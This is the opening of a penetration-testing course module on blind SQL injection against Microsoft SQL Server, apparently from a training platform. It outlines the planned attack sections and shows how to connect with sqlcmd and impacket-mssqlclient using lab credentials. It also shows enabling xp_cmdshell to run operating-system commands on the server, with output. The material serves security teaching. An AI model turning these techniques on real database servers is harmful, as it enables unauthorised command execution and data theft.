Summary

Blind SQL injection is an SQL injection where no results are directly returned to the attacker. This module focuses on writing custom scripts to exfiltrate data through alternative channels of communication. This module focuses on MSSQL specifically and so MSSQL-specific attacks are covered, including obtaining remote code execution.

This module is split up into the following 7 sections:

Introduction: A very brief introduction to MSSQL, and an introduction to blind SQL injection.
Boolean-based SQLi: Work through a custom website identifying a boolean-based blind SQLi vulnerabilities in a target website, writing a custom script to extract data, different ways to optimize the attack and out-of-band attacks to extract data as an alternative.
Time-based SQLi: Work through a second custom website identifying a time-based blind SQLi and writing a script to extract data.
MSSQL-Specific Attacks: Work through various MSSQL-specific attacks such as remote code execution and leaking NetNTLM hashes.
Tools of the Trade: Introduce commonly used tools to identify and exploit SQL injections.
Defending against SQL Injections: Various ways to prevent SQL injection vulnerabilities from happening in your projects.
Skills Assessment: Another custom website which involves identifying and exploiting multiple blind SQL injection vulnerabilities.

After completing this module, you should be comfortable identifying and writing custom scripts to exploit blind SQL injection vulnerabilities.

This module is broken into sections with accompanying hands-on exercises to practice the tactics and techniques we cover. The module ends with a practical hands-on skills assessment to gauge your understanding of the various topic areas.

As you work through the module, you will see example commands and command output for the topics introduced. It is worth reproducing as many of these examples as possible to reinforce further the concepts presented in each section. You can do this in the target host provided in the interactive sections or your virtual machine.

You can start and stop the module anytime and pick up where you left off. There is no time limit or "grading," but you must complete all of the exercises and the skills assessment to receive the maximum number of cubes and have this module marked as complete in any paths you have chosen.

The module is classified as "hard" and assumes an intermediate knowledge of how web applications function and common attack principles, along with knowledge of basic SQL injections.

Introduction to MSSQL/SQL Server

Introduction

SQL is a standardized language for interacting with relational databases. The five most common (as of Dec 15, 2022) are:

In this module, we will be focusing on blind SQL injection attacks using examples in Microsoft SQL Server (MSSQL). In addition to this, we will cover MSSQL-specific attacks. As SQL is standardized, the attacks taught in this module may be easily adapted to work against other relational databases.

Interacting with MSSQL

Although we will be dealing with injection vulnerabilities through websites for the rest of this module, it is helpful to understand how to interact with MSSQL/SQLServer directly, be it through a command line or GUI application.

Note: As this is an advanced SQL module, it is expected that you already understand the basics of SQL and are comfortable building queries yourself.

SQLCMD (Windows, Command Line)

SQLCMD is a command-line tool for Windows developed by Microsoft for interacting with MSSQL.

To connect to a SQL Server we can use the following syntax. In this case, we are connecting to the bsqlintro database on the server SQL01 with the credentials thomas:TopSecretPassword23!. The last flag (-W) removes trailing spaces, which makes the output a bit easier to read.

PS C:\htb> sqlcmd -S 'SQL01' -U 'thomas' -P 'TopSecretPassword23!' -d bsqlintro -W
1>

To run SQL queries, simply enter them and type GO (which is the default batch separator) at the end to run. In this example we select all table information, and then the top 5 posts from the users table joined with the posts table.

PS C:\htb> sqlcmd -S 'SQL01' -U 'thomas' -P 'TopSecretPassword23!' -d bsqlintro -W
1> SELECT *
2> FROM INFORMATION_SCHEMA.TABLES;
3> GO
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
bsqlintro dbo users BASE TABLE
bsqlintro dbo posts BASE TABLE

(2 rows affected)
1> SELECT TOP 5 users.firstName, users.lastName, posts.title
2> FROM users
3> JOIN posts
4> ON users.id=posts.authorId;
5> GO
firstName lastName title
--------- -------- -----
Edward Strong Voluptatem neque labore dolore velit ut.
David Ladieu Etincidunt etincidunt adipisci sed consectetur.
Natasha Ingham Aliquam quiquia velit non aliquam sed sit etincidunt.
Jessica Fitzpatrick Dolor porro quiquia labore numquam numquam sit.
Mary Evans Tempora sed velit consectetur labore consectetur.

(5 rows affected)

Impacket-MSSQLClient (Linux, Command Line)

MSSQLClient.py (or impacket-mssqlclient) is part of the Impacket toolset which comes preinstalled on many security-related linux distributions. We can use it to interact with remote MSSQL without having to use Windows.

The syntax to connect looks like this:

[!bash!]$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro

We can run queries as usual:

[!bash!]$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: bsqlintro
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'bsqlintro'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;

TABLE_CATALOG                                                          TABLE_SCHEMA                                                          TABLE_NAME                                                          TABLE_TYPE

-----------------------------------------------------------   -----------------------------------------------------------   -----------------------------------------------------------   -----------------------------------------------------------

bsqlintro                                                           dbo                                                               users                                                          b'BASE TABLE'   

bsqlintro                                                           dbo                                                               posts                                                          b'BASE TABLE'   


SQL> SELECT TOP 5 users.firstName, users.lastName, posts.title FROM users JOIN posts ON users.id=posts.authorId;

firstName                                                              lastName                                                              title

-----------------------------------------------------------   -----------------------------------------------------------   -----------------------------------------------------------   

b'Edward'                                                          b'Strong'                                                          b'Voluptatem neque labore dolore velit ut.'

b'David'                                                           b'Ladieu'                                                          b'Etincidunt etincidunt adipisci sed consectetur.'

b'Natasha'                                                         b'Ingham'                                                          b'Aliquam quiquia velit non aliquam sed sit etincidunt.'

b'Jessica'                                                         b'Fitzpatrick'                                                     b'Dolor porro quiquia labore numquam numquam sit.'

b'Mary'                                                            b'Evans'                                                           b'Tempora sed velit consectetur labore consectetur.'

SQL> exit

Since MSSQLClient.py is a pen-testing tool, it has a couple of features that help us when attacking MSSQL servers. For example, we can enable and use xp_cmdshell to run commands. We will cover this later on in the module.

[!bash!]$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: bsqlintro
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'bsqlintro'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(SQL01): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(SQL01): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
exitoutput                                                                             

--------------------------------------------------------------------------------   

NT SERVICE\mssqlserver

NULL                                                                               

SQL> exit

SQL Server Management Studio (Windows, GUI)

SQL Server Management Studio is a GUI tool developed by Microsoft for interacting with MSSQL. When launching the application we are prompted to connect to a server: